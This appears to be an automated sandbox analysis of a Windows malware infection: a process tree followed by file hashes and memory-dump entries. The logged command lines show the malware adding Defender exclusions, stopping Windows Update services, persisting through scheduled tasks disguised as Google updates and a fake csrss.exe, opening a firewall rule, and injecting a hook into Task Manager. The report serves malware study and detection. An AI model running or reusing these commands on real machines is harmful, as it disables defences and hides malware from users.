"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,3815385126526038010,7916656242102816677,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\71DA.exe
C:\Users\Admin\AppData\Local\Temp\71DA.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1460 -ip 1460
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2gD885Bc.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2gD885Bc.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4384 -ip 4384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp" /SL5="$70216,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6148 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6148 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\18B9.exe
C:\Users\Admin\AppData\Local\Temp\18B9.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\4853.exe
| MD5 | d2ed05fd71460e6d4c505ce87495b859 |
| SHA1 | a970dfe775c4e3f157b5b2e26b1f77da7ae6d884 |
| SHA256 | 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f |
| SHA512 | a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e |
C:\Users\Admin\AppData\Local\Temp\494E.exe
| MD5 | 4bd59a6b3207f99fc3435baf3c22bc4e |
| SHA1 | ae90587beed289f177f4143a8380ba27109d0a6f |
| SHA256 | 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236 |
| SHA512 | ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324 |
C:\Users\Admin\AppData\Local\Temp\494E.exe
| MD5 | 4bd59a6b3207f99fc3435baf3c22bc4e |
| SHA1 | ae90587beed289f177f4143a8380ba27109d0a6f |
| SHA256 | 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236 |
| SHA512 | ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ML5UJ9UF.exe
| MD5 | f4a25cc27c67ac3c7c24781451ed8645 |
| SHA1 | 3d0203832c2502d1a1546662381370f8555a6da1 |
| SHA256 | bcfa581e16475f75a0640ad60bb631a441f709e97519f71ce2baab2bc042148a |
| SHA512 | 859ccb2b38f8971ee98233b7f658a814f05bf2c5f303b374e9569276b506bcc828006159103704fc71cb8f68970db85b5e74da209c8f5a528d06ff797acfbfbc |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ML5UJ9UF.exe
| MD5 | f4a25cc27c67ac3c7c24781451ed8645 |
| SHA1 | 3d0203832c2502d1a1546662381370f8555a6da1 |
| SHA256 | bcfa581e16475f75a0640ad60bb631a441f709e97519f71ce2baab2bc042148a |
| SHA512 | 859ccb2b38f8971ee98233b7f658a814f05bf2c5f303b374e9569276b506bcc828006159103704fc71cb8f68970db85b5e74da209c8f5a528d06ff797acfbfbc |
C:\Users\Admin\AppData\Local\Temp\4A49.exe
| MD5 | 329bce2e07f7898910e3fd4e17b98d42 |
| SHA1 | 94d379a5964c97eefad6432608dd09b4ddb12b77 |
| SHA256 | 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e |
| SHA512 | a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5rK21Dd.exe
| MD5 | 60a2302c993cac42845d0106daf2285f |
| SHA1 | 8801acef0736218b0b5afbd43b400b0b387a1339 |
| SHA256 | 82c3ed0b64cd44041da54219a8ff484d5a7788e55a72548b678f52cd1246917a |
| SHA512 | 714ae643691a832cc61a6e189d181db8c30180a06125b19ca7cd56d2728ac1e087c349363ab430c7434651bdd6e2dcd97cc7e7b44de96c14fee0697c1aca5116 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SB7jI9jw.exe
| MD5 | 80d3af021591560f6f54a2ac75bb3674 |
| SHA1 | 367ad377ff18091f1dace31d4f389cee06a0a26e |
| SHA256 | 7d926595beaeb4c6f7990932af7b8522df52b308663a9ebea1dc28bc2d263291 |
| SHA512 | 378d395591f506091ea964b2e7145acc214adb4e8792fdda0ec7aae825a37743f570f311502daa16297a10f4b381f833bf1a3c26c7c77b095b2ff19ff95cc523 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SB7jI9jw.exe
| MD5 | 80d3af021591560f6f54a2ac75bb3674 |
| SHA1 | 367ad377ff18091f1dace31d4f389cee06a0a26e |
| SHA256 | 7d926595beaeb4c6f7990932af7b8522df52b308663a9ebea1dc28bc2d263291 |
| SHA512 | 378d395591f506091ea964b2e7145acc214adb4e8792fdda0ec7aae825a37743f570f311502daa16297a10f4b381f833bf1a3c26c7c77b095b2ff19ff95cc523 |
C:\Users\Admin\AppData\Local\Temp\4A49.exe
| MD5 | 329bce2e07f7898910e3fd4e17b98d42 |
| SHA1 | 94d379a5964c97eefad6432608dd09b4ddb12b77 |
| SHA256 | 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e |
| SHA512 | a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rL2Jv7vH.exe
| MD5 | f67a631d634093543f0808469d9e7d01 |
| SHA1 | 4de9280317b3f28cc6d32468dea6d57056025d72 |
| SHA256 | 1660d50c2849feae5b440c1b1dfc02e767b1a3eee7be7742865c1c3310471137 |
| SHA512 | 6cd1676e19884a80a4298a31c87923e59e598e9fa79fd15f03b6b53edf141cda4c708a8365b3705cd6b93abadff0c9d95a4d4d2e5cb662bbde544d14b0d48f5d |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rL2Jv7vH.exe
| MD5 | f67a631d634093543f0808469d9e7d01 |
| SHA1 | 4de9280317b3f28cc6d32468dea6d57056025d72 |
| SHA256 | 1660d50c2849feae5b440c1b1dfc02e767b1a3eee7be7742865c1c3310471137 |
| SHA512 | 6cd1676e19884a80a4298a31c87923e59e598e9fa79fd15f03b6b53edf141cda4c708a8365b3705cd6b93abadff0c9d95a4d4d2e5cb662bbde544d14b0d48f5d |
memory/4440-66-0x00000000006F0000-0x000000000074A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iU3eD1eN.exe
| MD5 | 02b70d03106b2be39612090a35f11918 |
| SHA1 | 01a0c549e838671676c0bca8ab669fc2932c5890 |
| SHA256 | b8dfa497d6952cc253acac91898c6e5458422e65e24ab3de2992f5ce4d675546 |
| SHA512 | 2bdedec5936f75e82a9608a60fe05a3d9c659e4275b8f610843a5e2319de2ca1b781c8d708a195d2b85ed4604287a1c03fe42574082c0e155c06c186babb8449 |
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iU3eD1eN.exe
| MD5 | 02b70d03106b2be39612090a35f11918 |
| SHA1 | 01a0c549e838671676c0bca8ab669fc2932c5890 |
| SHA256 | b8dfa497d6952cc253acac91898c6e5458422e65e24ab3de2992f5ce4d675546 |
| SHA512 | 2bdedec5936f75e82a9608a60fe05a3d9c659e4275b8f610843a5e2319de2ca1b781c8d708a195d2b85ed4604287a1c03fe42574082c0e155c06c186babb8449 |
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fz10YT6.exe
| MD5 | a4090e07eccf512586e108e9cd985688 |
| SHA1 | b6d29df601e92708be5316fc9904bfcd59e53945 |
| SHA256 | 5af23a007cf75205560d6f3890c5d949951dc2b565327ed190a9dc1651531756 |
| SHA512 | 915c8061c9dd9e129f5e4d0fff84f602a4213f3b00428bb585da653508e142a41fd96d5ac1c53c56cc69a0fb47dfacfd1f6adb66c0d15d5496c724123e080542 |
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fz10YT6.exe
| MD5 | a4090e07eccf512586e108e9cd985688 |
| SHA1 | b6d29df601e92708be5316fc9904bfcd59e53945 |
| SHA256 | 5af23a007cf75205560d6f3890c5d949951dc2b565327ed190a9dc1651531756 |
| SHA512 | 915c8061c9dd9e129f5e4d0fff84f602a4213f3b00428bb585da653508e142a41fd96d5ac1c53c56cc69a0fb47dfacfd1f6adb66c0d15d5496c724123e080542 |
memory/3860-82-0x0000000000F20000-0x0000000000F2A000-memory.dmp
memory/4356-83-0x0000000074620000-0x0000000074DD0000-memory.dmp
memory/4440-78-0x0000000000400000-0x000000000047E000-memory.dmp
memory/4356-84-0x0000000000590000-0x00000000005CE000-memory.dmp
memory/3860-77-0x0000000074620000-0x0000000074DD0000-memory.dmp
memory/4440-85-0x0000000074620000-0x0000000074DD0000-memory.dmp
memory/4440-87-0x0000000006FB0000-0x0000000007554000-memory.dmp
memory/4356-91-0x0000000007440000-0x00000000074D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
| MD5 | 4bd59a6b3207f99fc3435baf3c22bc4e |
| SHA1 | ae90587beed289f177f4143a8380ba27109d0a6f |
| SHA256 | 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236 |
| SHA512 | ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324 |
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
| MD5 | 4bd59a6b3207f99fc3435baf3c22bc4e |
| SHA1 | ae90587beed289f177f4143a8380ba27109d0a6f |
| SHA256 | 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236 |
| SHA512 | ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f4787679d96bf7263d9a34ce31dea7e4 |
| SHA1 | ebbade52b0a07d888ae0221ad89081902e6e7f1b |
| SHA256 | bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87 |
| SHA512 | de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307 |
memory/4356-103-0x00000000075E0000-0x00000000075F0000-memory.dmp
memory/4356-104-0x0000000007600000-0x000000000760A000-memory.dmp
memory/4440-102-0x00000000075D0000-0x00000000075E0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f4787679d96bf7263d9a34ce31dea7e4 |
| SHA1 | ebbade52b0a07d888ae0221ad89081902e6e7f1b |
| SHA256 | bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87 |
| SHA512 | de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307 |
memory/4440-111-0x0000000007DA0000-0x0000000007DB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\671A.exe
| MD5 | 395e28e36c665acf5f85f7c4c6363296 |
| SHA1 | cd96607e18326979de9de8d6f5bab2d4b176f9fb |
| SHA256 | 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa |
| SHA512 | 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de |
C:\Users\Admin\AppData\Local\Temp\671A.exe
| MD5 | 395e28e36c665acf5f85f7c4c6363296 |
| SHA1 | cd96607e18326979de9de8d6f5bab2d4b176f9fb |
| SHA256 | 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa |
| SHA512 | 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de |
memory/4440-116-0x0000000007DC0000-0x0000000007ECA000-memory.dmp
memory/4640-120-0x0000000074620000-0x0000000074DD0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6863.exe
| MD5 | 8e4c82c39fdb3c524a81f62ded2d6c2e |
| SHA1 | bde413f720af010f5c9d8f745d79be00c0fd3c1e |
| SHA256 | be534d74fab71aae643e680faf16cc0d6150f8653afe3c7fc9f949ca7f2e48e7 |
| SHA512 | c88868cdc8f6c66e5fe0c1073ae394a03a20f5530de057e5fb604fef25754bf1bd26e70eba67b7cd610e50313bfc8190adb684b084b6d0dc1ac833a06d35edb2 |
memory/4640-118-0x0000000000970000-0x0000000001356000-memory.dmp
memory/4440-127-0x0000000007ED0000-0x0000000007F0C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\65B1.exe
| MD5 | dd879217d6270ce10527c1f4752e2602 |
| SHA1 | 9b95b9be2b977cf9b7f5b268e33b2a8abc438e3d |
| SHA256 | a406a3c1474a57c62f3dbd56aa15d5d732e6a0fe8bbfd7bce9425b132204da8b |
